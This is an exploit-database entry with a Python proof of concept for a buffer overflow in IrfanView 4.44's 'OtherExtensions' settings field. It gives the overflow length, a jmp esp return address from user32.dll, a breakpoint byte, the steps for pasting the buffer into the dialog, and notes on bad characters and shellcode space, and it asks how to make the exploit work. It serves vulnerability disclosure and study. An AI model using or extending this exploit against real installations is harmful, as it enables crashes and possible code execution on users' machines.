IrfanView 4.44 - Denial of Service

Author: Dreivan Orprecio
type: dos
platform: windows
port: 
date_added: 2017-04-30 
date_updated: 2017-04-30 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url: http://www.exploit-db.com/screenshots/idlt42000/screen-shot-2017-04-30-at-235859.png 
application_url: http://www.exploit-db.comiview444_setup.exe

# Exploit Title: Irfanview - OtherExtensions Input Overflow
# Date: 29-04-2017
# Software Link: http://download.cnet.com/IrfanView/?part=dl-&subj=dl&tag=button
# Exploit Author: Dreivan Orprecio
#Version: Irfanview 4.44
#Irfanview is vulnerable to overflow in "OtherExtensions" input field
#Debugging Machine: WinXP Pro SP3 (32bit)


#POC

#!usr/bin/python


      eip = "\xf7\x56\x44\x7e" #jmp esp from user32.dll



      buffer = "OtherExtensions="+"A" *  199 + eip + "\xcc"

      print buffer              #a) irfanview->Option->Properties/Settings->Extensions
                                #b) Paste the buffer in the "other" input then press ok, repeat a) and b)





#badcharacters: those instruction that start with 6,7,8,E,F
#Only 43 bytes space to host a shellcode and lots of badchars make it hard for this to exploit
#Any other way around this?